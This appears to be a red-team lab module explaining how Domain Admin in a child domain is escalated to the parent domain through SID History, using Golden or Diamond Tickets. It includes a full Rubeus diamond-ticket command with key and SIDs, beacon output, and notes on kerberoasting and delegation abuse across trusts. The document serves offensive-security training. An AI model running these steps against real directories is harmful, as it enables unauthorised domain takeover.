When a child domain is added to a forest, it automatically creates a transitive, two-way trust with its parent. This can be found in the lab where dev.cyberbotic.io is a child domain of cyberbotic.io.
SourceName is the current domain, TargetName is the foreign domain, TrustDirection is the trust direction (bidirectional is two-way), and TrustAttributes: WITHIN_FOREST lets us know that both of these domains are part of the same forest which implies a parent/child relationship.
If we have Domain Admin privileges in the child, we can also gain Domain Admin privileges in the parent using a TGT with a special attribute called SID History. SID History was designed to support migration scenarios, where a user would be moved from one domain to another. To preserve access to resources in the "old" domain, the user's previous SID would be added to the SID History of their new account. When creating such a ticket, the SID of a privileged group (EAs, DAs, etc) in the parent domain can be added that will grant access to all resources in the parent.
This can be achieved using either a Golden or Diamond Ticket.
\
Golden Ticket
The process is the same as creating Golden Tickets previously, the only additional information required is the SID of a target group in the parent domain.
Then import it into a logon session and use it to access the domain controller in the parent.
beacon> run klist
Current LogonId is 0:0x3a6665
Cached Tickets: (1)
#0> Client: Administrator @ DEV.CYBERBOTIC.IO
Server: krbtgt/dev.cyberbotic.io @ DEV.CYBERBOTIC.IO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
beacon> ls \\dc-1.cyberbotic.io\c$
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 15:26:54 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 11:11:21 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 09/08/2022 17:33:33 ProgramData
dir 08/15/2022 15:07:48 Recovery
dir 08/24/2022 11:05:32 Shares
dir 08/31/2022 16:44:18 System Volume Information
dir 08/15/2022 15:09:04 Users
dir 08/24/2022 11:10:45 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/12/2022 08:36:09 DumpStack.log.tmp
384mb fil 09/12/2022 08:36:09 pagefile.sys
\
Diamond Ticket
The Rubeus diamond command also has a /sids parameter, with which we can supply the extra SIDs we want in our ticket.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:519 /sids:S-1-5-21-2594061375-675613155-814674916-519 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap
[*] Action: Diamond Ticket
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc-2.dev.cyberbotic.io'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: KT+juea5lxCbxNfLLWbgRorvmR+gRkaoifHatrHE0GE=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIF1j[...]5JTw==
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIGAj[...]lDLklP
\
If dev.cyberbotic.io also had a child (e.g. test.dev.cyberbotic.io), then a DA in TEST would be able to use their krbtgt to hop to DA/EA in cyberbotic.io instantly because the trusts are transitive.
There are also other means which do not require DA in the child. For example, you can also kerberoast and ASREProast across domain trusts, which may lead to privileged credential disclosure. Because principals in CYBER can be granted access to resources in DEV, you may find instances where they are accessing machines we have compromised. If they interact with a machine with unconstrained delegation, we can capture their TGTs. If they're on a machine interactively, such as RDP, we can impersonate them just like any other user.